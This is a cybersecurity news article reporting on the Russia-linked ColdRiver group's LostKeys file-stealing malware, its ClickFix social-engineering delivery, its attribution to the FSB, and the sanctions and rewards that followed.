Since the beginning of the year, the Russia-backed ColdRiver hacking group has been deploying new LostKeys malware
in espionage campaigns targeting Western governments, journalists, think tanks, and non-governmental organizations.
In December, the United Kingdom and Five Eyes allies linked ColdRiver to Russia's Federal Security Service (FSB), the nation's internal security and counterintelligence agency.
The Google Threat Intelligence Group (GTIG) first noticed the use of LostKeys in January, where it was deployed in targeted ClickFix social engineering attacks. In these attacks, threat actors deceive victims into running malicious PowerShell scripts. These scripts download and execute additional PowerShell payloads on compromised systems, culminating in the deployment of a Visual Basic Script (VBS) malware and LostKeys are used to steal files.
"LOSTKEYS is designed to steal files with specific extensions and from specific directories, while also collecting system information and active processes to send back to the attacker," said GTIG.
"COLDRIVER typically steals credentials and uses them to steal emails and contacts from the target. However, they may also deploy malware like SPICA when they wish to access specific documents on a target system. LOSTKEYS has a similar purpose and is deployed only in selective cases," GTIG added.
ColdRiver is not alone in utilizing ClickFix attacks, with other state-backed groups such as Kimsuky (North Korea), MuddyWater (Iran), APT28, and UNK_RemoteRogue (Russia) employing similar tactics in recent espionage operations. Known also as Star Blizzard, Callisto Group, and Seaborgium, ColdRiver has used social engineering and open-source intelligence (OSINT) to identify and target victims since at least 2017.
In December 2023, Five Eyes cyber agencies issued warnings about ColdRiver’s spear-phishing campaigns targeting defense, government organizations, NGOs, and political figures. These attacks, which escalated after Russia's invasion of Ukraine, also expanded to include defense-industrial targets and U.S. Department of Energy facilities.
In 2022, the Microsoft Threat Intelligence Center (MSTIC) disrupted another ColdRiver social engineering operation, where the hackers used Microsoft accounts to harvest emails and track the activities of organizations and individuals in NATO countries.
In December 2023, the U.S. State Department sanctioned two ColdRiver operators (including one FSB officer) who were also indicted by the U.S. Justice Department for their involvement in a global hacking campaign coordinated by the Russian government.
The State Department is now offering rewards of up to $10 million for information that could assist law enforcement in locating or identifying other ColdRiver members.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
